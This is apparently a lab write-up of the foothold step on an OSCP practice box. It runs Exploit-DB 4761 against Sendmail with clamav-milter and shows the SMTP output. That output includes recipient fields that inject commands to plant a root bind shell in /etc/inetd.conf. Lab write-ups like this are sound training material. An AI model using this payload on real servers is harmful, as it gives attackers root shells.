Foothold

ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution/exploit.c at main · 0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-ExecutionGitHub

$ sudo tcpdump -i tun0 icmp

Opted for another exploit

$ searchsploit -m 4761           
  Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/4761
     Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
    Codes: CVE-2007-4560
 Verified: True
File Type: ASCII text
Copied to: /home/adot/oscp/pg/clamav/4761.pl

$ perl 4761.pl 192.168.166.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.166.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Fri, 16 Aug 2024 03:40:58 -0400; (No UCE/UBE) logging access from: [192.168.45.204](FAIL)-[192.168.45.204]
250-localhost.localdomain Hello [192.168.45.204], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 47G7ewaf004758 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connection

Previous445 NextEnumeration

Last updated 1 year ago